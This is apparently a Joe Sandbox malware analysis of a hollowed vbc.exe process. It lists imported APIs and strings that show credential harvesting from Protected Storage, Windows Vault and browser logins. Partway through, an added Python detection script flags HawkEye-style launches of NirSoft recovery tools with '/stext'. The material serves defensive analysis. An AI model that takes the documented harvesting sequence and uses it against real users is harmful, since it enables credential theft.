                                                                                                                                                                        • API String ID: 1579243037-1578091866
                                                                                                                                                                        • Opcode ID: c14f26a3bd4bd4d31eab25ef7948187d43d10632211a5499f155237dcc845ca2
                                                                                                                                                                        • Instruction ID: da88191f08b8b868428b3ed71d9c82d207ce8b6ace4e6628c3e2187065429015
                                                                                                                                                                        • Opcode Fuzzy Hash: c14f26a3bd4bd4d31eab25ef7948187d43d10632211a5499f155237dcc845ca2
                                                                                                                                                                        • Instruction Fuzzy Hash: 7521F271700502AFD714FF36C981A5AB3A9FF95304B01097FE459A72D2CB7ABC218B99
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        APIs
                                                                                                                                                                          • Part of subcall function 00413ACB: FreeLibrary.KERNELBASE(?,0040ADDC), ref: 00413AD7
                                                                                                                                                                        • LoadLibraryW.KERNELBASE(pstorec.dll), ref: 0040ADE1
                                                                                                                                                                        • GetProcAddress.KERNEL32(00000000,PStoreCreateInstance), ref: 0040ADF4
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000008.00000002.715632355.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_8_2_400000_vbc.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: Library$AddressFreeLoadProc
                                                                                                                                                                        • String ID: PStoreCreateInstance$pstorec.dll
                                                                                                                                                                        • API String ID: 145871493-2881415372
                                                                                                                                                                        • Opcode ID: fdc831568e2784af9de8c5a906fe078fe08317c6051ed8042a8c169ffd09e9de
                                                                                                                                                                        • Instruction ID: 165486c3e6602412b12b5041488cd1e6311a4fd56e7abe132b6c53b1702dbca2
                                                                                                                                                                        • Opcode Fuzzy Hash: fdc831568e2784af9de8c5a906fe078fe08317c6051ed8042a8c169ffd09e9de
                                                                                                                                                                        • Instruction Fuzzy Hash: D8F0E2302807125BEB206F76DC06B9B32D8AF44B4AF10C43EA052D55C1EBBCD4808B9D
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        APIs
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000008.00000002.715632355.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_8_2_400000_vbc.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: ??3@
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 613200358-0
                                                                                                                                                                        • Opcode ID: 6dc2ae8407accaec33e914c995c073318a836f74cf280773562707ce9086f27d
                                                                                                                                                                        • Instruction ID: 83d98c8e739894f4f11ae52403c2f1a0732df397c2cb69f7507dcdbda06e161a
                                                                                                                                                                        • Opcode Fuzzy Hash: 6dc2ae8407accaec33e914c995c073318a836f74cf280773562707ce9086f27d
                                                                                                                                                                        • Instruction Fuzzy Hash: F7E04DA070030136BB20AFBAFD44B0323CC3A90793326482FB406D73D2EE2CE840A52C
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        APIs
                                                                                                                                                                        Strings
                                                                                                                                                                        • only a single result allowed for a SELECT that is part of an expression, xrefs: 0043A1CA
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000008.00000002.715632355.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_8_2_400000_vbc.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: memset
                                                                                                                                                                        • String ID: only a single result allowed for a SELECT that is part of an expression
                                                                                                                                                                        • API String ID: 2221118986-1725073988
                                                                                                                                                                        • Opcode ID: a02f6a0a02fcd16c7aa4dd96e86c2c528519a914f69e8e6aa23dcbcbdf6080a7
                                                                                                                                                                        • Instruction ID: e3eeb75a8af282f970fbf78469263b11f6465a284568bf7e48a5e115ce459d1a
                                                                                                                                                                        • Opcode Fuzzy Hash: a02f6a0a02fcd16c7aa4dd96e86c2c528519a914f69e8e6aa23dcbcbdf6080a7
                                                                                                                                                                        • Instruction Fuzzy Hash: F1828771A00208AFDF24DF69C881AAE7BA1FF08314F14411AFD559B3A2D77AEC51CB95
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        APIs
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000008.00000002.715632355.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_8_2_400000_vbc.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: ??2@
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 1033339047-0
                                                                                                                                                                        • Opcode ID: 7383806280aca4e1821e19982c5cfbbe854b0cbcf0857156c862d8a82c6a6e7a
                                                                                                                                                                        • Instruction ID: 41d6ca53bbc25777d15e7d44d7af272a9a829ad4135043ac9a1f5f7c0c786f2e
                                                                                                                                                                        • Opcode Fuzzy Hash: 7383806280aca4e1821e19982c5cfbbe854b0cbcf0857156c862d8a82c6a6e7a
                                                                                                                                                                        • Instruction Fuzzy Hash: ED0112F12023007FEB69DF38ED1772A66949B95393F00413FA506CD2F6EA79D5449B08
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        APIs
                                                                                                                                                                          • Part of subcall function 004443B0: LoadLibraryW.KERNELBASE(vaultcli.dll,?,00000000), ref: 004443BD
                                                                                                                                                                          • Part of subcall function 004443B0: GetProcAddress.KERNEL32(00000000,VaultOpenVault), ref: 004443D2
                                                                                                                                                                          • Part of subcall function 004443B0: GetProcAddress.KERNEL32(00000000,VaultCloseVault), ref: 004443DF
                                                                                                                                                                          • Part of subcall function 004443B0: GetProcAddress.KERNEL32(00000000,VaultEnumerateItems), ref: 004443EC
                                                                                                                                                                          • Part of subcall function 004443B0: GetProcAddress.KERNEL32(00000000,VaultFree), ref: 004443F9
                                                                                                                                                                          • Part of subcall function 004443B0: GetProcAddress.KERNEL32(00000000,VaultGetInformation), ref: 00444406
                                                                                                                                                                          • Part of subcall function 004443B0: GetProcAddress.KERNEL32(00000000,VaultGetItem), ref: 00444414
                                                                                                                                                                          • Part of subcall function 004443B0: GetProcAddress.KERNEL32(00000000,VaultGetItem), ref: 0044441D
                                                                                                                                                                        • memcmp.MSVCRT ref: 0044455D
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000008.00000002.715632355.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_8_2_400000_vbc.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: AddressProc$LibraryLoadmemcmp
                                                                                                                                                                        • String ID: $$8
                                                                                                                                                                        • API String ID: 2708812716-435121686
                                                                                                                                                                        • Opcode ID: 201099f9feb607c4c8b0fa66378feea82f4e3e51204f541575a2dd3d377ec3c8
                                                                                                                                                                        • Instruction ID: 4b210d59022fde833576912f2e87238d6fd1d6b03e73e285368f71a5ac649bda
                                                                                                                                                                        • Opcode Fuzzy Hash: 201099f9feb607c4c8b0fa66378feea82f4e3e51204f541575a2dd3d377ec3c8
                                                                                                                                                                        • Instruction Fuzzy Hash: 73411171E00609ABEF10DF95C981BAFB7F4AF88714F11055AE915B3341DB78AE448BA4
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        APIs
                                                                                                                                                                          • Part of subcall function 00403C2A: LoadLibraryW.KERNEL32(advapi32.dll,?,0040A9C2,?,https://login.yahoo.com/config/login,00000000,http://www.facebook.com/,00000000,https://www.google.com/accounts/servicelogin,00000000,?,00000000,?,00411E75,?,?), ref: 00403C35
                                                                                                                                                                          • Part of subcall function 00403C2A: GetProcAddress.KERNEL32(00000000,CryptAcquireContextA), ref: 00403C49
                                                                                                                                                                          • Part of subcall function 00403C2A: GetProcAddress.KERNEL32(?,CryptReleaseContext), ref: 00403C55
                                                                                                                                                                          • Part of subcall function 00403C2A: GetProcAddress.KERNEL32(?,CryptCreateHash), ref: 00403C61
                                                                                                                                                                          • Part of subcall function 00403C2A: GetProcAddress.KERNEL32(?,CryptGetHashParam), ref: 00403C6D
                                                                                                                                                                          • Part of subcall function 00403C2A: GetProcAddress.KERNEL32(?,CryptHashData), ref: 00403C79
                                                                                                                                                                          • Part of subcall function 00403C2A: GetProcAddress.KERNEL32(?,CryptDestroyHash), ref: 00403C85
                                                                                                                                                                        • wcslen.MSVCRT ref: 0040A819
                                                                                                                                                                        • memset.MSVCRT ref: 0040A898
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000008.00000002.715632355.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_8_2_400000_vbc.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: AddressProc$LibraryLoadmemsetwcslen
                                                                                                                                                                        • String ID: P5@
                                                                                                                                                                        • API String ID: 1960736289-1192260740
                                                                                                                                                                        • Opcode ID: 20a957c6aa2ccba46100227cc7926e2e9aca7a542005eb85cce3c7ff41f048fe
                                                                                                                                                                        • Instruction ID: 9cce22c2db06112b06b017d7de527652cc15472bfd2168745658b7e1f8ccbd38
                                                                                                                                                                        • Opcode Fuzzy Hash: 20a957c6aa2ccba46100227cc7926e2e9aca7a542005eb85cce3c7ff41f048fe
                                                                                                                                                                        • Instruction Fuzzy Hash: CC31D272500208AFDF10EFA4CC85DEE77B9AF48304F15887AF505F7281D638AE198B66
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        APIs
                                                                                                                                                                          • Part of subcall function 00416E8B: SetFilePointer.KERNELBASE(?,?,?,00000000), ref: 00416EAC
                                                                                                                                                                          • Part of subcall function 00416E8B: GetLastError.KERNEL32 ref: 00416EBD
                                                                                                                                                                          • Part of subcall function 00416E8B: GetLastError.KERNEL32 ref: 00416EC3
                                                                                                                                                                        • ReadFile.KERNELBASE(?,?,?,?,00000000), ref: 00416F38
                                                                                                                                                                        • GetLastError.KERNEL32 ref: 00416F42
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000008.00000002.715632355.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_8_2_400000_vbc.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: ErrorLast$File$PointerRead
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 839530781-0
                                                                                                                                                                        • Opcode ID: 3e8702d37d071127fc233bfbf67a625d2feb83188ba54958d653ceabaac702fa
                                                                                                                                                                        • Instruction ID: add61fd64035c303a46c69afbbac6c0b4560a134b5de48ff3df98cfac7bf87f9
                                                                                                                                                                        • Opcode Fuzzy Hash: 3e8702d37d071127fc233bfbf67a625d2feb83188ba54958d653ceabaac702fa
                                                                                                                                                                        • Instruction Fuzzy Hash: 2D01AD3A208208BBEB108F65EC45FEA3B6CEF053A4F114426F908C6250D724EC9186E9
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000008.00000002.715632355.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_8_2_400000_vbc.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: wcslen$FileFindFirst
                                                                                                                                                                        • String ID: *.*$index.dat
                                                                                                                                                                        • API String ID: 1858513025-2863569691
                                                                                                                                                                        • Opcode ID: 9238a7d079e1375fbfde003b790de4053d9ee43c5394c8ca1f03ef328d3985c3
                                                                                                                                                                        • Instruction ID: 18b6580ac0a830e75170eb0e1623f763ef95ee80692c464e75bb199377268105
                                                                                                                                                                        • Opcode Fuzzy Hash: 9238a7d079e1375fbfde003b790de4053d9ee43c5394c8ca1f03ef328d3985c3
                                                                                                                                                                        • Instruction Fuzzy Hash: 20016D7140526859EB20EA61DC42ADE726CAF04304F5001BBA818F21C2EB789F929F5A
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        APIs
                                                                                                                                                                        • SetFilePointer.KERNELBASE(?,?,?,00000000), ref: 00416EAC
                                                                                                                                                                        • GetLastError.KERNEL32 ref: 00416EBD
                                                                                                                                                                        • GetLastError.KERNEL32 ref: 00416EC3
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000008.00000002.715632355.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_8_2_400000_vbc.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: ErrorLast$FilePointer
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 1156039329-0
                                                                                                                                                                        • Opcode ID: 850b182fd2585f694b2736305c6ca07a69ca9fa842c0c1da9be3e232dd73cee9
                                                                                                                                                                        • Instruction ID: 37b1e2f091545ca96408f8d6a34600ec4a403a46a608ba1f9fdc83bbdb8077e2
                                                                                                                                                                        • Opcode Fuzzy Hash: 850b182fd2585f694b2736305c6ca07a69ca9fa842c0c1da9be3e232dd73cee9
                                                                                                                                                                        • Instruction Fuzzy Hash: F4F06536914619BBCF009F74DC009EA7BE8EB05361B104726F832D62D1E731EE419A94
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

APIs
• GetTempPathW.KERNEL32(00000104,?,?), ref: 00408114
• GetWindowsDirectoryW.KERNEL32(?,00000104), ref: 00408126
• GetTempFileNameW.KERNELBASE(?,004029F6,00000000,?), ref: 0040813D
Memory Dump Source
• Source File: 00000008.00000002.715632355.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_8_2_400000_vbc.jbxd
Yara matches
Similarity
• API ID: Temp$DirectoryFileNamePathWindows
• String ID:
• API String ID: 1125800050-0
• Opcode ID: cd2f3735bba2878a79e9f19a3eb817c818f21bd1f1f6eaeb7cc68637a741f96c
• Instruction ID: a19870345f686364ec187dd7d23bdf0954ef371c81d74b5a6631b0975d4c9c24
• Opcode Fuzzy Hash: cd2f3735bba2878a79e9f19a3eb817c818f21bd1f1f6eaeb7cc68637a741f96c
• Instruction Fuzzy Hash: BDE0927A900328BBDF205B60DC0CFCB377CEF46304F000070B945E6152EA7896888BA8
Uniqueness
Uniqueness Score: -1.00%

APIs
• malloc.MSVCRT ref: 004080C8
• memcpy.MSVCRT ref: 004080E0
• free.MSVCRT(00000000,00000000,?,00408F0C,00000002,?,00000000,?,0040923F,00000000,?,00000000), ref: 004080E9
Memory Dump Source
• Source File: 00000008.00000002.715632355.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_8_2_400000_vbc.jbxd
Yara matches
Similarity
• API ID: freemallocmemcpy
• String ID:
• API String ID: 3056473165-0
• Opcode ID: b35ef3f807938d4c0a098e15bd5b29d1098e3b6b761d1f171dd30fe06938ab32
• Instruction ID: 78eaf63d8c2f3f9895426ca65e1500e544e2a4a90d5a49d0f549448db46f5a47
• Opcode Fuzzy Hash: b35ef3f807938d4c0a098e15bd5b29d1098e3b6b761d1f171dd30fe06938ab32
• Instruction Fuzzy Hash: 50F0E2726052229FD718EE75BA8180BB39DAF85364712883FF444E3282DF3C9C44C7A8
Uniqueness
Uniqueness Score: -1.00%

APIs
• ReadFile.KERNELBASE(?,?,CCD,00000000,00000000,?,?,00444343,00000000,00000000), ref: 00408994
Strings
Memory Dump Source
• Source File: 00000008.00000002.715632355.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_8_2_400000_vbc.jbxd
Yara matches
Similarity
• API ID: FileRead
• String ID: CCD
• API String ID: 2738559852-662205380
• Opcode ID: 95fe6112964d8fece6e22643851d15c8512762a174cc85b994d828cd4959b37f
• Instruction ID: 69216e87a8676b039392231de9c3b52b74dec2ebcb54b9129181f8e0c6c75afe
• Opcode Fuzzy Hash: 95fe6112964d8fece6e22643851d15c8512762a174cc85b994d828cd4959b37f
• Instruction Fuzzy Hash: 6CD0C93541020DFBDF01CF80DC06FDD7BBDEB05359F108054BA0095160C7759A10AB54
Uniqueness
Uniqueness Score: -1.00%

Strings
Memory Dump Source
• Source File: 00000008.00000002.715632355.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_8_2_400000_vbc.jbxd
Yara matches
Similarity
• API ID:
• String ID: d
• API String ID: 0-2564639436
• Opcode ID: 57876eaa3a191597bfab1e7f39998f19745de974ac05e3c4f75a78f05ee54f6b
• Instruction ID: fc4515617b89e60a19d50c15f4f69ae244da8edec6c232cce581781c6edd6396
• Opcode Fuzzy Hash: 57876eaa3a191597bfab1e7f39998f19745de974ac05e3c4f75a78f05ee54f6b
• Instruction Fuzzy Hash: 5981B031608312AFCB10DF19D84165FBBE0EF88718F12992FF8949B251D778DA45CB9A
Uniqueness
Uniqueness Score: -1.00%

APIs
Strings
Memory Dump Source
• Source File: 00000008.00000002.715632355.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_8_2_400000_vbc.jbxd
Yara matches
Similarity
• API ID: memset
• String ID: BINARY
• API String ID: 2221118986-907554435
• Opcode ID: d19efc801e877f0ce795817df0e0cc72f0fc1a5f5a7d27e56dc3ca5837767e46
• Instruction ID: 80603cce4df8086f4253f53369ac634731a2704b4a2dc635bb3c7b15e71801b6
• Opcode Fuzzy Hash: d19efc801e877f0ce795817df0e0cc72f0fc1a5f5a7d27e56dc3ca5837767e46
• Instruction Fuzzy Hash: B951AD75A043459FDB21DF2AC881BEA7BE4EF48350F14446AEC89CB341D738D980CBA9
Uniqueness
Uniqueness Score: -1.00%

APIs
  • Part of subcall function 0040C513: ??2@YAPAXI@Z.MSVCRT ref: 0040C534
  • Part of subcall function 0040C513: ??3@YAXPAX@Z.MSVCRT ref: 0040C5FB
• GetStdHandle.KERNEL32(000000F5,?,0040FF40,00000000,00000000,?,00000000,00000000,00000000), ref: 0040DD6C
• FindCloseChangeNotification.KERNELBASE(00000000,?,0040FF40,00000000,00000000,?,00000000,00000000,00000000), ref: 0040DE90
  • Part of subcall function 00407D94: CreateFileW.KERNELBASE(00000000,40000000,00000001,00000000,00000002,00000000,00000000,0040DD67,00000000,?,0040FF40,00000000,00000000,?,00000000,00000000), ref: 00407DA6
  • Part of subcall function 00407DF4: GetLastError.KERNEL32(00000000,?,0040DEA5,00000000,?,0040FF40,00000000,00000000,?,00000000,00000000,00000000), ref: 00407E08
  • Part of subcall function 00407DF4: _snwprintf.MSVCRT ref: 00407E35
  • Part of subcall function 00407DF4: MessageBoxW.USER32(00000000,?,Error,00000030), ref: 00407E4E
Memory Dump Source
• Source File: 00000008.00000002.715632355.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_8_2_400000_vbc.jbxd
Yara matches
Similarity
• API ID: ??2@??3@ChangeCloseCreateErrorFileFindHandleLastMessageNotification_snwprintf
• String ID:
• API String ID: 1161345128-0
• Opcode ID: 3d3b21ef697afd0bdb833f204540dd718a0a6addb83a3789607b508d28bd4cbe
• Instruction ID: 75199abba107ca30350ead5857dca6b94cadfdfaeaa302ec2f3d27d1e62cce92
• Opcode Fuzzy Hash: 3d3b21ef697afd0bdb833f204540dd718a0a6addb83a3789607b508d28bd4cbe
• Instruction Fuzzy Hash: BD417F35E00604EBCB219FA9C885A5EB7B6AF54714F20406FF446AB2D1CB389E44DA99
Uniqueness
Uniqueness Score: -1.00%

APIs
Strings
Memory Dump Source
• Source File: 00000008.00000002.715632355.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_8_2_400000_vbc.jbxd
Yara matches
Similarity
• API ID: _wcsicmp
• String ID: /stext
• API String ID: 2081463915-3817206916
• Opcode ID: a01bfb8d808dbe57cbee4fd70ed2a4dbf1f3eb0a587578e83f1d012f6d402b9a
• Instruction ID: 2161babe09ea1c109a016804ff5c091d56ac672142073ac0305c405afa28cd18
• Opcode Fuzzy Hash: a01bfb8d808dbe57cbee4fd70ed2a4dbf1f3eb0a587578e83f1d012f6d402b9a
• Instruction Fuzzy Hash: 37216074B00205AFD714EFAAC881A9DB7A9FF84304F1001BFA415A7782DB79AD148B95
Uniqueness
Uniqueness Score: -1.00%
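The `_wcsicmp` against `/stext` in the entry above, together with the GetTempFileNameW, CreateFileW(GENERIC_WRITE, CREATE_ALWAYS) and ReadFile entries from the same dump, is the recognisable shape of HawkEye driving the NirSoft recovery tools the report flags (MailPassView, WebBrowserPassView): drop the tool to a temp file, run it with `/stext <tempfile>`, read the output back and delete it. The following is an added detection example for process-creation telemetry, not code from the Joe Sandbox report and not HawkEye's own code. The log lines are constructed, and the `Image|ParentImage|CommandLine` field layout (Sysmon event 1 style), the vbc.exe parent and the scoring weights are assumptions.

```python
import re
from dataclasses import dataclass
from typing import Optional

# Constructed sample events (assumption: one event per line, Sysmon event 1
# style fields separated by '|'). Not output from the sandbox run on this page.
SAMPLE_LOG = """\
Image=C:\\Users\\bob\\AppData\\Local\\Temp\\tmp1A2B.tmp|ParentImage=C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\vbc.exe|CommandLine="C:\\Users\\bob\\AppData\\Local\\Temp\\tmp1A2B.tmp" /stext "C:\\Users\\bob\\AppData\\Local\\Temp\\tmp3C4D.tmp"
Image=C:\\Program Files\\Tool\\tool.exe|ParentImage=C:\\Windows\\explorer.exe|CommandLine="C:\\Program Files\\Tool\\tool.exe" /stext C:\\Users\\bob\\Desktop\\export.txt
Image=C:\\Windows\\System32\\notepad.exe|ParentImage=C:\\Windows\\explorer.exe|CommandLine=notepad.exe C:\\Users\\bob\\stext.txt
"""

# '/stext <path>' as a standalone switch (case-insensitive), path quoted or not.
STEXT_RE = re.compile(r'(?i)(?:^|\s)/stext\s+("?)([^"]+?)\1(?=\s|$)')
# A '\Temp\' or '\Tmp\' path component, where GetTempPathW/GetTempFileNameW land.
TEMP_RE = re.compile(r'(?i)\\(?:Temp|Tmp)\\')


@dataclass
class Hit:
    image: str
    parent: str
    output: str   # file passed to /stext, i.e. where the harvested credentials go
    score: int    # 1 = /stext seen; up to 4 with the HawkEye-style temp-file traits


def parse_line(line: str) -> dict:
    """Split one 'key=value|key=value' event line into a dict."""
    return dict(field.split("=", 1) for field in line.rstrip("\n").split("|"))


def check_event(ev: dict) -> Optional[Hit]:
    """Return a Hit when the event is a /stext launch, scored by how closely it
    matches the drop-to-Temp pattern seen in the dump; None otherwise."""
    m = STEXT_RE.search(ev.get("CommandLine", ""))
    if not m:
        return None
    image = ev.get("Image", "")
    output = m.group(2)
    score = 1                                   # /stext alone: NirSoft-style save-as-text
    if TEMP_RE.search(image):
        score += 1                              # tool itself runs from a Temp directory
    if TEMP_RE.search(output):
        score += 1                              # output written to a Temp directory
    if image.lower().endswith(".tmp"):
        score += 1                              # GetTempFileNameW-style tmpXXXX.tmp name
    return Hit(image=image, parent=ev.get("ParentImage", ""), output=output, score=score)


def scan(log: str) -> list:
    """Run check_event over every non-empty line of a log blob, keeping hits."""
    hits = []
    for line in log.splitlines():
        if not line.strip():
            continue
        hit = check_event(parse_line(line))
        if hit is not None:
            hits.append(hit)
    return hits


if __name__ == "__main__":
    for h in scan(SAMPLE_LOG):
        print(f"score={h.score} image={h.image} parent={h.parent} -> {h.output}")
```

A score of 1 on its own is expected from legitimate NirSoft use; the Temp-path and `.tmp`-image conditions are what separate the HawkEye drop-and-run pattern, and a parent that is a hollowed .NET host such as vbc.exe (the process the dump on this page came from) is the other field worth alerting on. One reading note on the listings: `FindCloseChangeNotification.KERNELBASE` is almost certainly `CloseHandle`, since both names resolve to the same export address in kernelbase.dll and the disassembler keeps one label for both.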

APIs
Strings
• failed to allocate %u bytes of memory, xrefs: 00414C46
Memory Dump Source
• Source File: 00000008.00000002.715632355.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_8_2_400000_vbc.jbxd
Yara matches
Similarity
• API ID: malloc
• String ID: failed to allocate %u bytes of memory
• API String ID: 2803490479-1168259600
• Opcode ID: 37a0e16a31e73fb3f1329956b653d3eb145f9cbc4939c84207ade25bbdcda1f4
• Instruction ID: cc16955a0d14ca8776a7aa5b229d79c98c920de21d1adc6b7d8c4ece6c284845
• Opcode Fuzzy Hash: 37a0e16a31e73fb3f1329956b653d3eb145f9cbc4939c84207ade25bbdcda1f4
• Instruction Fuzzy Hash: 64E020B7F0361267C2004615DC0168777959FD132171B0637F95CD3680D63CD84587A9
Uniqueness
Uniqueness Score: -1.00%

APIs
• Sleep.KERNEL32(00000064), ref: 00416EEB
• FindCloseChangeNotification.KERNELBASE(0CC483FF,00000000,00000000,004536AC,0041753F,00000008,00000000,00000000,?,004176FC,?,00000000), ref: 00416EF4
Memory Dump Source
• Source File: 00000008.00000002.715632355.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_8_2_400000_vbc.jbxd
Yara matches
Similarity
• API ID: ChangeCloseFindNotificationSleep
• String ID:
• API String ID: 1821831730-0
• Opcode ID: cc2e2d56278e834b5826f7bb8f80f5f4d654d385e6d95c8a2fc1f4074e09f098
• Instruction ID: ddbdeb719d62bbcd0ae2c24f8bc232808eb7cee6ac061654c4d164212cdc0068
• Opcode Fuzzy Hash: cc2e2d56278e834b5826f7bb8f80f5f4d654d385e6d95c8a2fc1f4074e09f098
• Instruction Fuzzy Hash: 35E0C23F11071A9FDB0097BCDC90AD773D8EF56338726433AF662C61A0CA65D8828654
Uniqueness
Uniqueness Score: -1.00%

                                                                                                                                                                        APIs
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000008.00000002.715632355.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_8_2_400000_vbc.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: memcmpmemset
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 1065087418-0
                                                                                                                                                                        • Opcode ID: 9b44e04d39c850c09dfc470b21759ac07039072516198818df3f324f61dd621a
                                                                                                                                                                        • Instruction ID: 1efd5175aaeb232b83b4fa12f0066e98a2b2c589ef3b7fe000d2c80dadf29316
                                                                                                                                                                        • Opcode Fuzzy Hash: 9b44e04d39c850c09dfc470b21759ac07039072516198818df3f324f61dd621a
                                                                                                                                                                        • Instruction Fuzzy Hash: AF617C71A01245EFDB10EFA485C06EEB7B4FB54308F14846FE11497281E738AED59B9A
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        APIs
                                                                                                                                                                        • free.MSVCRT(?,00409176,00000000,?,00000000), ref: 00408DA2
                                                                                                                                                                        • free.MSVCRT(?,?,00409176,00000000,?,00000000), ref: 00408DAA
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000008.00000002.715632355.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_8_2_400000_vbc.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: free
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 1294909896-0
                                                                                                                                                                        • Opcode ID: 24817b5554e4738b88c440df0c7233c3037c59b36583c92020dd6282cd28d1d1
                                                                                                                                                                        • Instruction ID: aaa92272bc418c7d1270a62145ca905ed0b036dea6655797c2fa71225ad517e5
                                                                                                                                                                        • Opcode Fuzzy Hash: 24817b5554e4738b88c440df0c7233c3037c59b36583c92020dd6282cd28d1d1
                                                                                                                                                                        • Instruction Fuzzy Hash: D3D042B0404B008FE7B0DF39E401606BBF0AB483103208D2E90AAC2A50E775A1049F08
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        APIs
